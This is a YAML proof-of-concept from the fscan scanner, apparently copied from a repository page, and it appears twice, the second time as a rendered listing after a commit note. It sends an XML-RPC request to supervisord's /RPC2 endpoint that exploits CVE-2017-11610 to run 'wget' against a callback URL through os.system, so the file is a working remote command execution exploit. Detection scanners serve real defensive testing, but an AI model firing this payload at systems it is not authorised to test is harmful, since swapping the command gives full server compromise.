fscan/Web_Scan/pocs/supervisord-cve-2017-11610.yml

name: poc-yaml-supervisord-cve-2017-11610
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: POST
    path: /RPC2
    body: >-
      <?xml version="1.0"?>
            <methodCall>
            <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
            <params>
            <param>
            <string>wget {{reverseURL}}</string>
            </param>
            </params>
            </methodCall>
    follow_redirects: false
    expression: |
      response.status == 200 && reverse.wait(5)
detail:
  author: Loneyer
  links:
    - https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610
优化xray解析模块,支持groups、新增poc 2021-11-15 19:53:46 -08:00			`name: poc-yaml-supervisord-cve-2017-11610`
			`set:`
			`reverse: newReverse()`
			`reverseURL: reverse.url`
			`rules:`
			`- method: POST`
			`path: /RPC2`
			`body: >-`
			`<?xml version="1.0"?>`
			`<methodCall>`
			`<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>`
			`<params>`
			`<param>`
			`<string>wget {{reverseURL}}</string>`
			`</param>`
			`</params>`
			`</methodCall>`
			`follow_redirects: false`
			`expression: \|`
			`response.status == 200 && reverse.wait(5)`
			`detail:`
			`author: Loneyer`
			`links:`
			`- https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610`